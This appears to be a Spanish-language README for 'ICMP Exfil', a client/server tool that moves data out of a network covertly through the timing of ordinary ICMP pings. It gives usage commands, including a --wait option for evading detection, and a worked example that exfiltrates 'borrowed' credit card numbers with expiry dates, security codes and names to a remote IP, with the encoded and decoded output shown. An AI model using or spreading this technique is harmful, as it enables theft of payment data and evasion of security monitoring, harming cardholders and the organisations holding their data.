
Exfiltra datos con ICMP
ICMP Exfil te permite transmitir datos a través de paquetes ICMP válidos. Usas el script del cliente para pasar los datos que deseas exfiltrar, y luego en el dispositivo al que estás transmitiendo ejecutas el servidor. Cualquier persona que observe (sea humano o sistema de seguridad) solo verá paquetes ICMP válidos, no hay nada malicioso en la estructura de los paquetes. Tus datos tampoco están ocultos dentro de los paquetes ICMP, por lo que mirar el paquete no te dice qué fue exfiltrado.

Martino Jones, martinojones.com.
Por ahora, lo único para lo que he añadido soporte son caracteres ASCII. Podrás exfiltrar cualquier cosa que pueda representarse con caracteres ASCII (por ejemplo, letras y números). Por ejemplo: si tomaste prestados algunos números geniales de 16 dígitos, usarías el script del cliente para pasar esos números a tu servidor haciendo ./ping.py --ascii "4111111111111111".
Tienes dos opciones para configurar el servidor al que enviar. Puedes usar --ip o puedes establecer la IP predeterminada en el script llamado ipToPing.
Si quieres ser un poco más paciente y dificultar que la gente note que estás exfiltrando datos, puedes usar --wait para especificar la cantidad de tiempo mínimo + el tiempo que se supone debe pasar para que los datos se transfieran. Esto todavía está en desarrollo... así que tendrás que hacer esta conversión tú mismo, pero no debería tomarme mucho tiempo agregarlo... tampoco importa demasiado ya que la mayoría de las personas y sistemas de seguridad aún no lo detectan.
Si deseas ver los pings que están pasando, puedes usar --show.
Cuando quieras iniciar el servidor, simplemente ejecuta sudo python3 server.py. No necesitas hacer nada más. Cuando hayas terminado, solo necesitas presionar Control+C. Por ahora, el servidor necesita trabajo, debe mapear la entrada según quién recibió los datos; actualmente solo lo he probado con un cliente haciendo ping al servidor, esto por supuesto necesita ser ajustado. La base ya está ahí, solo falta organizar el reinicio.
Encontré una base de datos llena de estos números geniales de 16 dígitos, necesito guardarlos para futuras investigaciones, así que los guardo en un archivo llamado file:
Comando:./ping.py --ip 1.2.3.4 --asciiFile file
Contenido del archivo: 4587965312457852 01/15 456 Martino Jones | 4567965382457452 03/16 236 Martino Joe
Datos codificados: ['0110100', '0110101', '0111000', '0110111', '0111001', '0110110', '0110101', '0110011', '0110001', '0110010', '0110100', '0110101', '0110111', '0111000', '0110101', '0110010', '0100000', '0110000', '0110001', '0101111', '0110001', '0110101', '0100000', '0110100', '0110101', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1101110', '1100101', '1110011', '0100000', '1111100', '0100000', '0110100', '0110101', '0110110', '0110111', '0111001', '0110110', '0110101', '0110011', '0111000', '0110010', '0110100', '0110101', '0110111', '0110100', '0110101', '0110010', '0100000', '0110000', '0110011', '0101111', '0110001', '0110110', '0100000', '0110010', '0110011', '0110110', '0100000', '1001101', '1100001', '1110010', '1110100', '1101001', '1101110', '1101111', '0100000', '1001010', '1101111', '1100101', '0001010']
Servidor:
Calculating offsets
4 5 8 7 9 6 5 3 1 2 4 5 7 8 5 2 0 1 / 1 5 4 5 6 M a r t i n o J o n e s | 4 5 6 7 9 6 5 3 8 2 4 5 7 4 5 2 0 3 / 1 6 2 3 6 M a r t i n o J o e
Si deseas ayudar, hay varias cosas que aún necesito agregar: